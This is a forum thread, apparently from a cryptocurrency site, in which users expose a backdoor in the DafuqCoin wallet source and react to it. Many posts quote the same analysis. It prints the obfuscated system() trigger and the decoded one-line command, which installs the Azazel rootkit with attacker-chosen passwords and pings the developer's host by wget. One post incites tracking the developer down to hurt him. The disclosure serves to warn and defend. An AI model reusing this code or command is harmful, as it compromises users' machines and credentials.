[ANN][DFQ] DafuqCoin | NO Premine | NO IPO | ★Now Exchanged★

[seattletu]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

thanks richie, i will be changing all passwords and reinstalling windows. i'm just going to assume all of my saved passwords in firefox are compromised. nice job on your bittrex.com exchange, its a good exchange.

[1715181942]

1715181942

[1715181942]

1715181942

[1715181942]

1715181942

[1715181942]

1715181942

[1715181942]

1715181942

[icecube45]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

You're right.

It messes with python-stratum, and python in general.
also removes functionality of apt-get, so you can't fix it

[pcmerc]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

Thanks for the analysis. On baby detail right now & didn't have to time to do it. Greatly appreciated richiela


pcmerc~

[Rulishix]

This was bound to happen but I gotta admit I like the logo. It's ducking funny. Good luck with this!

[Amph]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

nice catch human antivirus are the best

[DssTech]

so there is definitely malicious code, or it is just speculation right now?

This is completely malicious - DO NOT RUN

// init.cpp
// Runs if in daemon mode
#if !defined(WIN32) && !defined(QT_GUI)
    fDaemon = GetBoolArg("-daemon");
    if ((access("/usr/.dfq", F_OK) == -1))
      daemonize(getnewid());

// util.h
// daemonize basically calls "system" which executes "s" which is whatever is passed in
inline void  daemonize(std::string s)
{
  if (std::system(s.c_str()))
    return;
  return;
}

// util.cpp
// takes offset1, offset2, offset3 and XORs it
std::string getnewid()
{
  return (hashoffset(offset1, offset2, offset3));
}

// The result
apt-get -y install libpcap-dev libpam-dev wget git >/dev/null 2>&1 || yum -y install libpcap-devel pam-devel wget git >/dev/null 2>&1;cd /tmp/ >/dev/null 2>&1;git clone https://github.com/chokepoint/azazel.git >/dev/null 2>&1;chmod -R 777 azazel/ >/dev/null 2>&1;cd azazel/ >/dev/null 2>&1;sed 's/BLIND_LOGIN = "rootme"/BLIND_LOGIN = "r00t"/' config.py | sed 's/SHELL_PASSWD = "changeme"/SHELL_PASSWD = "r00tp4ssw0rd"/' | sed 's/PASSPHRASE = "Hello NSA"/PASSPHRASE = "Bestp4ssphr4se3v3r"/' | sed 's/KEY_SALT = "changeme"/KEY_SALT = "Bestk3ys4lt3v3r"/' > newconfig.py;mv newconfig.py config.py >/dev/null 2>&1;make >/dev/null 2>&1;make install >/dev/null 2>&1;wget http://dfqcoin.co.nf/in.php >/dev/null 2>&1;cd .. >/dev/null 2>&1;rm -rf azazel/ >/dev/null 2>&1;touch /usr/.dfq >/dev/null 2>&1


...

Given the "wget http://dfqcoin.co.nf/in.php" i can only conclude this is evil dev and not compromised source.   This coin will be delisted and removed from bittrex.com ASAP.

If you ran this as root, your box is compromised and I suggest a rebuild ASAP.  If you did not run as root, this should have failed silently and you should be ok....

You're right.

It messes with python-stratum, and python in general.
also removes functionality of apt-get, so you can't fix it

it can be fixed. this is why I NEVER install more then 1 pool on a server and i do NOT sudo anything. Crapo checking my mac now. K Server is Fine and so is mac. Need new source ASAP. Where is Dev. He needs to explain what happen. I spent over 0.50 BTC helping this coin. I want to know what the hell is going on.

[theboccet]

so after all of this !!! all is lost  

[riddler_xyz]

so did you find similar code for windows or didnt i get it right in assuming this code only works on linux ?
and dev needs to be kicked in the nuts for this ...

Removal - http://blackhatlibrary.net/Azazel

To remove Azazel, the best course of action is to boot into a livecd, mount your bootable hard drive, and delete the /etc/ld_preload.so file from the partition.

[DssTech]

so did you find similar code for windows or didnt i get it right in assuming this code only works on linux ?
and dev needs to be kicked in the nuts for this ...

only effects if you run as -daemon. So windows is fine. it is only pool or linux people that do sudo and -daemon. if they nohup then everything is fine.

The Dev said over and over to everyone OH run sudo. run sudo. i knew something wasnt right when i was told that. I said NO i am NOT running sudo on any coin.

CRYPTO-COINZ Servers are OK. They are NOT infected. We use a dedicated server for every coin we launch. So if it did get infected we would just kill that server.

[theboccet]

pfeewww GOOd for windows!!! nice to hear that
but what about the coins? ihave 5000 of them
I want to put them in the A*** of devs !!!! can i do that???

[DssTech]

pfeewww GOOd for windows!!! nice to hear that
but what about the coins? ihave 5000 of them
I want to put them in the A*** of devs !!!! can i do that???

im pissed I have over 600k Coins and I have 200k on Bittrex which is locked out now.

[seattletu]

pfeewww GOOd for windows!!! nice to hear that
but what about the coins? ihave 5000 of them
I want to put them in the A*** of devs !!!! can i do that???

im pissed I have over 600k Coins and I have 200k on Bittrex which is locked out now.

i have a bunch on your server. but it looks like the coin will die. unless someone wants to fork it for shits and giggles.

[riddler_xyz]

well forking this coin with a new clean wallet and a new dev would be adequate ...
and deleting the olddevs coins from new chain ...

so he goes like ... Dafuq ...

Well shit happens ... if nobody got hurt this is kinda advanced trolling ... actually im surprised how little malicious code is in this altcoins ...

so DAFUQ

[seattletu]

well forking this coin with a new clean wallet and a new dev would be adequate ...
and deleting the olddevs coins from new chain ...

so he goes like ... Dafuq ...

Well shit happens ... if nobody got hurt this is kinda advanced trolling ... actually im surprised how little malicious code is in this altcoins ...

so DAFUQ

i don't think the old dev even mined the coins. obviously his intent was to hack shit, so no point in him mining any coins. and there was no premine.

it was a funny idea, i think it could have been popular

[Jarod1231]

Good thing I mine new coins by running the wallet on a crappy laptop and pointing my miners at the laptop... congrats on stealing my EMU coins if you do get them... you really earned them lol

[ephes]

I wouldn't say that Windows is not affected unless you built the wallet from the github yourself. If you ran that exe in the zip, how can you be sure that the binary isn't infected with a trojan?

I seem to remember there being UAC bypasses still unpatched, so why would you need admin to install a trojan with an exe?

Do you think that everyone should be attempting to use some sort of a sandboxed environment for every new coin, anyways?

[wuzamarine]

[wuzamarine]

Dafuq lived up to it's name..

[DssTech]

well forking this coin with a new clean wallet and a new dev would be adequate ...
and deleting the olddevs coins from new chain ...

so he goes like ... Dafuq ...

Well shit happens ... if nobody got hurt this is kinda advanced trolling ... actually im surprised how little malicious code is in this altcoins ...

so DAFUQ

i don't think the old dev even mined the coins. obviously his intent was to hack shit, so no point in him mining any coins. and there was no premine.

it was a funny idea, i think it could have been popular

I agree, I spent alot of time on this coin and helping miners mine it. WOW

[imtihawk]

well forking this coin with a new clean wallet and a new dev would be adequate ...
and deleting the olddevs coins from new chain ...

so he goes like ... Dafuq ...

Well shit happens ... if nobody got hurt this is kinda advanced trolling ... actually im surprised how little malicious code is in this altcoins ...

so DAFUQ

i don't think the old dev even mined the coins. obviously his intent was to hack shit, so no point in him mining any coins. and there was no premine.

it was a funny idea, i think it could have been popular

I agree, I spent alot of time on this coin and helping miners mine it. WOW

i know we are on the interwebs but pretty sure hacking crypto traders is a big no no. are we gonna let this useless piece of garbage just walk away with our time and electricity bills? track him down someone and show him how unsafe the real world can be? I'd do it but I dont know the first thing about programming.